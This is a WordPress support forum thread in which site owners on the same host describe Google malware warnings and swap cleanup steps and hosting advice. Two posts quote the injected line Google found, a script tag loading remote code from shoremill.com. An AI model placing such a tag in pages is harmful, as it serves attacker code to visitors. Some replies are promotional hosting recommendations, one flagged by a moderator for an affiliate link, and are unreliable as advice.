malware detected by google on my site – wordpress 3.0.1

  • Google discovered harmful code on my site after I installed wordpress 3.0.1
    I erased the wordpress folder from my site, downloaded it again and installed it in another site that was clean and immediately google found again harmful code. This is what google says:

    Malicious software includes 1 scripting exploit(s), 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

    Malicious software is hosted on 1 domain(s), including shoremill.com/.

    This site was hosted on 1 network(s) including AS32392 (OPENTRANSFER).

    On the webmasters tools diagnostics it says this:
    Suspected injected code:
    <script src=https://shoremill.com/_private/blank.php >

    How can I install wordpress without this happening?

Viewing 10 replies - 1 through 10 (of 10 total)

  • when you erased it the first time, did google continue to find malware? if you downloaded wp from a secure location and you were not tricked.. then it sounds like your server may be compromised, and possibly what ever has compromised it is targeting wp… but thats just my thoughts..

    Hi PROMEDIO, i have had the exact same Malware discovered on my site b Google. Until now my Host Company (IXwebhosting) is still working on finding the source for the problem.

    This “<script src=https://shoremill.com/_private/blank.php >” seems to be installing itself on many of my pages and posts. I have looked time and again on the net trying to find someone that can share some light on how to get rid of this Malware, and more important how to prevent it from coming back.

    The steps i have taken are as follow:
    1. I have immediately informed my Host Company and provided them with as much information as possible for their Security department to be able to investigate.

    2. I have installed the “Secure WordPress” plugin, which im still not sure if it will help at all, but there are some 140,000 other users who downloaded it so i guess it will do something.

    3. this might have been the most important part for my blockage of Google, i have logged to my Webmaster account / Malware section and have acknowledge the issue. i have asked Google to review my site again and have made a note of all the actions I have taken to correct the issue.

    Currently, (about 20 hours later) my site is back online without any of the Google alerts. I still get the indication of the Malware though and my Host Company are still investigating.

    If anyone have any information of how to deal with this please do respond to this post.

    thank you.
    D.

    Thread Starter PROMEDIO

    (@promedio)

    Thanks crewparty,
    We have exactly the same problem, I’m also hosting on IXwebhosting.
    On the google forum they told me to erase the file “gifimg.php” on the images folder. I found that file inserted on every images folder for every site I’m hosting and erased it. Be sure to look for it in every folder and erase it.

    if youre both in ixwebhosting, i personally would wonder if their servers have been compromised, this may not be the case, but thats a little fishy

    Hi Guys, I have been with IXwebhosting for many years now and must say that out of over 10 different webhosting companies I dealt with and used their services,IXwebhosting are above average in terms of Value for money and Customer service. However, this first time (and I must say exceptional event) left me with over 5 websites affected mainly on the Admin section of my WordPress making it un inaccessible.

    I have been on the IXwebhosting case since this started going back 4 days ago and they have not been as helpful as they usually are. also I must say that when I asked them if this is only me or if there are other affected website on their server they stuck by saying that they cannot discuss individual cases with me (in other words, admitting there are and Promedio is a proof of that).

    Today, after being on their case as I do daily, I got a reply to my ticket saying:

    “Hello Daniel,
    Thank you for contacting our technical team.

    We are glad to inform you that we have successfully cleaned your account from malware. Unfortunately your account has been hacked through WordPress vulnerabilities. We strongly recommend you to upgrade all your WordPress applications with modules and components to the latest versions. The following link may be useful for you in order to upgrade your applications:
    https://codex.www.ads-software.com/Updating_WordPress

    Please make sure that you always use latest versions of software on your web sites to be more secure.”

    Still, it seems that issue remains

    1. My browser still block my affected pages which means that the F….ing shoremill.com Malware is till crawling there.
    2. Through my Webmaster account i can still see all the findings appearing. (bear in mind that it will take time for Google to reflect an updated Malware status after review)

    I would very much appreciate if anyone could share a way to prevent this from happening recommending a plugin or a service that can be used as a firewall to such attacks.

    D.

    thats all very fishy.. web hosts are hard to find ones that are actually good. id recommend certifiedhosting read their reviews, they are extremely helpful and less than 5 bux.. and if you got a dedicated server they will do all kinds of stuff for you like 3rd party scripts, they all come off as big nerds to me and thats a good thing because they know what their doing… good luck. they also have one click installs of wordpress, so you never have to worry about doing it wrong. maybe thats just me ??

    Just to update you all, the IXwebhosting team has now cleaned up the shoremill warm. Google has now white list the site and it looks as if we are back in business.

    Spoke to IXwebhosting on the chat and over the phone, and to all of you that are trying to figure out what is the right thing to do I can say:

    1. Always immediately inform your Host so they can take immediate action.

    2. keep a clean back up of both SQL and Full script on a daily bases

    3. Don’t keep all your websites on one server or one account on the same server so if one catch a mal not all of the sites catch the mal

    4. The fact is that the guys at IXwebhosting did solve the issue and took care of it. Maybe not as fast as I wanted (took 3 days) but the job was done.

    issue remains that there isn’t any one good Plugin for WordPress to try and prevent this things from happening.

    D.

    So here’s an update. the Malware seems to be back in town today. just few hours after the team at IXwebhosting has said the site was clear. the thing is that according to Google it was indeed clean. however it showed up again.

    i must tell you that after going through hours of searching I came across https://www.ipage.com which I’m now going to try. a lot of good comments but it seems that except of being good value for money they also offer a Prevent Identity Theft & Secure Your Data for just $12.95/year

    Identify security vulnerabilities that could lead to Identity Theft and allow hackers to steal sensitive information. Exclusive registration price!

    i think i will take their service for one year (approx $54 all unlimited like IXwebhosting) but let’s see how does that work for me.

    D.

    Added modlook for mcdanman’s post up there with the affiliate link.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    ?????? Advisor and Activist

    Got it.

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘malware detected by google on my site – wordpress 3.0.1’ is closed to new replies.